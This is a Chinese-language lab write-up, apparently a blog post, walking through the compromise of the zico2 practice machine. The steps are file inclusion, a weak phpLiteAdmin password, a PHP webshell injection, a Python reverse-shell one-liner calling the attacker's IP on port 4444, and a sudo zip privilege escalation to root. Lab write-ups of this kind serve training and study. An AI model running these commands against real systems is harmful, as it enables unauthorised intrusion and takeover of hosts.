vulhub 靶机zico2

ip地址扫描
image.png
image.png
端口扫描
image.png
访问80端口
image.png
点击后发现如下url
image.png
测试是否存在文件包含漏洞
尝试显示它的/etc/passwd,发现显示,说明存在文件包含漏洞
image.png
目录扫描
http://192.168.237.163/css/
http://192.168.237.163/dbadmin/
http://192.168.237.163/img/
http://192.168.237.163/js/
发现四个目录
依次进行访问
访问/css/出现如下页面
image.png
访问/dbadmin出现如下页面
image.png
点击php文件
image.png
发现密码输入框
剩余两个页面访问之后都是图片或者js文件,只能从这儿突破
尝试弱口令admin
image.png
成功登录
image.png
发现是数据库管理系统
点击浏览,发现用户名及密码
image.png
将密码进行MD5解密
image.png
尝试ssh连接,失败
image.png
kali查询phpliteadmin有没有漏洞
image.png
发现存在远程php代码注入漏洞
在页面中创建一个新的数据库,创建新表,表名为b
image.png
创建字段,默认值为一句话木马
image.png
创建成功
image.png
显示shell.php路径
image.png
使用上面发现的文件包含,访问创建的数据库
image.png

image.png
使用上面发现的文件包含,访问创建的数据库
image.png
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.237.131”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
利用python反弹shell

image.png
kali监听,反弹shell
image.png
利用python3进入交互式命令
python -c ‘import pty;pty.spawn(“/bin/bash”)’
image.png
image.png
发现zico用户的密码
image.png
image.png
image.png

zico@zico:~$ touch a
zico@zico:~$ sudo zip a.zip a -T --unzip-command="sh -c /bin/bash"
sudo zip a.zip a -T --unzip-command="sh -c /bin/bash"
  adding: a (stored 0%)
root@zico:~# 

zip提权
image.png
在root目录下,读取flag.txt
image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值